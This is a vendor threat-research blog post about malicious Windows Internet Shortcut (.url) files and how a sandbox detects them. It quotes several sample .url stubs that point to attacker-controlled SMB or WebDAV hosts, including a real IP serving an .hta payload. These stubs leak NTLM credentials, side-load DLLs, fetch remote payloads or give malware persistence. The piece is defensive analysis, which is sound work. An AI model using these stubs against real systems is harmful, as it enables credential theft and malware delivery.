Shortcut to Malice, Part 3: Behavioral Analysis of URL Files Using MetaDefender Sandbox

While static inspection reveals what a file contains, dynamic analysis tells us what it does. When it comes to Internet Shortcut files (.url), this distinction is vital. Seemingly harmless on disk, these files often act as trigger points in multi-stage malware campaigns — executing remote payloads, stealing credentials, or enabling persistence.

In this third and final installment of our series on URL file threats, we focus on dynamic behavior: how .url files operate in the real world and what post-execution activity they reveal. This behavioral perspective is best examined through MetaDefender Sandbox, OPSWAT’s malware detonation environment that emulates end-user interaction and uncovers execution paths that static scanning can’t detect.

You can view the previous two blogs by selecting from the below options:

• Part 1: Shortcut to Malice: Why URL Files Are Back in the Cyberthreat Spotlight
• Part 2: Shortcut to Malice: Static Analysis of Malicious URL Files and the Tradecraft Behind Them

Static analysis flags suspicious formatting, but MetaDefender Sandbox captures runtime behaviors that indicate real compromise, such as:

• DNS queries or outbound HTTP connections to attacker infrastructure
• Invocation of Windows components (e.g., mshta.exe, wscript.exe) to launch payloads
• File writes to autostart locations or the Windows Registry
• SMB authentication attempts that leak NTLM credentials
• WebDAV fallback communications over HTTP/80 after failed SMB attempts

Another contribution to the big picture of URL file abuse occurred in 2018, and this time concerning information leakage and the potential for URL files to play a role in capturing authentication and credential material by remote attackers. 

In May, Securify noted several ways that subsystems in Windows could be tricked into sending a user’s NTLM credentials to an attacker-controlled host. They disclosed two methods using URL files, such as this simple method simply using the file:// prefix to reference a remote file: 

[InternetShortcut] 

URL=file://<responder ip>/leak/leak.html

…as well as this sample, using the IconFile option to trigger the URL handler to retrieve a remote icon file for extraction of an image to render:

[InternetShortcut] 

URL=https://securify.nl 

IconIndex=0 

IconFile=\\<responder ip>\leak\leak.ico

In the case of the second one, it becomes clear that there are many elements of concern, including the optionality of a protocol prefix, interchangeable use of forward- or back-slashes, and the overall persistence of SMB as an unintended channel of privilege elevation through risky access to attacker infrastructure converge in what is common seen attack surface in the operating system.

This same approach of using the IconFile option for credential access was also discussed by Alex Inführ at a later time. As noted, when these URL files are activated, SMB connections to the remote servers are initiated, resulting in the authentication exchange and disclosure of NTLM credential data to the attacker. The common adversarial toolkit used on the remote end of these types of attacks by numerous threat actors is Responder.

Another aspect of abuse potential for URL files was disclosed by Inführ in discussion of abusing fields in the files to execute untrusted code through DLL side-loading. In this proof of concept, a URL file is used to point to a local executable file that is vulnerable to DLL search path hijacking; upon activating the URL file, the WorkingDirectory option is processed, leading to the search path for loaded DLL being set to include an attacker-controlled directory on a remote SMB share.

[InternetShortcut] 

URL=C:\windows\...\mscorsvw.exe 

WorkingDirectory=\\attacker[.]com\SMBShare\

As documented in malware campaigns such as Zscaler ThreatLabz’ analysis of DBatLoader being used to distribute Remcos and Formbook RATs, URL files are a shortcut file that can also be used for execution on a system.  

When linked to autostart locations, these files also support a means of persistence to enable malware to execute after reboot or login. The following URL file was used in the case of this distribution campaign, enabling startup of the malware payload in Xdfiifag.exe.

[InternetShortcut] 

URL=file:"C:\\Users\\Public\\Libraries\\Xdfiifag.exe" 

IconIndex=13 

HotKey=49

In June 2023, @AnFam17 shared information about a social engineering-based landing traffic redirector distributing users to loads of the NetSupport RAT, again notably through URL files. The upstream social engineering-based landing pages were tied to a kit known as FakeSG. Sample URL file (Install Updater (msi-stable(V102.84.3348).url): 

[InternetShortcut] 

URL=file:\\94.158.247.6@80\Downloads\updatermsi.hta 

ShowCommand=7 

IconIndex=247 

IconFile=C:\Windows\System32\shell32.dll

This URL file illustrates, like prior iterations, that the file:// protocol prefix may be represented with a high level of flexibility, here using backslashes rather than forward slashes, and highlighting an aspect that can be challenging for detection engineers.

It’s worth noting here that also similar to previously mentioned URL files using file prefixes, there is an inherent inconsistency occurring. In the case of these URLs, the attacker is hosting the payloads on a WebDAV server, leading to the content being retrieved not using SMB, but instead over HTTP using the WebDAV protocol on port 80/tcp.

Another notable instance in the nexus of this topic occurred around the disclosure of another high-profile vulnerability, CVE-2023-36884, publicly disclosed in July of 2023. This was at the time a 0-day vulnerability that had been reported as utilized in targeted attack campaigns, utilized by a threat group for distribution of a modified variant of the RomCom RAT.  

The complex, multi-stage threat chain returned focus to the topic of URL file handling and surfaced observations of uncheck remote code execution when a payload is loaded from a ZIP archive path accessed over WebDAV. 

With this retrospective into the abuse space of Internet Shortcut (URL files), we can see that for a period of years, they have played a role in the threat landscape, albeit a supporting role, and seldom the leading star of the show. Oftentimes, enabling technologies and security feature bypasses are ranked as low severity vulnerabilities, and are sometimes even disregarded as non-security bugs, not making it to the level of CVE acceptance by vendors.

Many times, as threat analysts, we prioritize the most obvious culprit in threat sequences, placing most emphasis on end payloads and how attackers action on objective. However, it is important to note that today’s adversaries have come to realize that raised costs from attack surface reduction can be met by increasingly complex file-based tradecraft, and attack sequences using URL files are often a good indicator of their use in such attack chains.

OPSWAT recommends that organizations maintain focus in this space of complex and multi-layered file-based tradecraft.

• Monitor for access attempts to remote URL files. Organizations may find it feasible to block access to remotely hosted URL files.
• Analyze and inspect targets in URL files encountered in the environment, looking for those abusing the features of file:// based protocols, those referencing external SMB or WebDAV pathways, and other anomalies in URL, IconFile and WorkingDirectory fields
• Monitor and validate outbound SMB and WebDAV sessions with external, untrusted infrastructure. Note that a number of services and cloud storage solutions supporting WebDAV are available and have been abused in threat campaigns, including 4shared, DriveHQ and OpenDrive. These services provide attackers with publicly available and non-attributable services that can be exploited in targeting potential victims.
• Block connections to external SMB services. Years of associated threat activity have shown this to be a continual source of pain for information leakage, remote code execution, and related risks. Future attacks are likely to continue to weaponize these sorts of tactics, especially against legacy OS versions, and controls such as these can help detect and disrupt unknown threats in these cases.
• Leverage our state-of-the-art Deep File Inspection® and RetroHunt® technology, to scan deeper and expose more file-borne attacks than any other solution.

This article demonstrated how URL files act far beyond simple shortcuts: they initiate credential leaks, fetch payloads from untrusted networks, hijack DLL loading, and even persist malware on endpoints.

The only way to detect these behaviors with certainty is to observe them — and that’s where MetaDefender Sandbox provides critical insight. Together with the power of Deep File Inspection and the context provided by MetaDefender InSights, organizations can stay ahead of file-borne threats in every phase of the kill chain.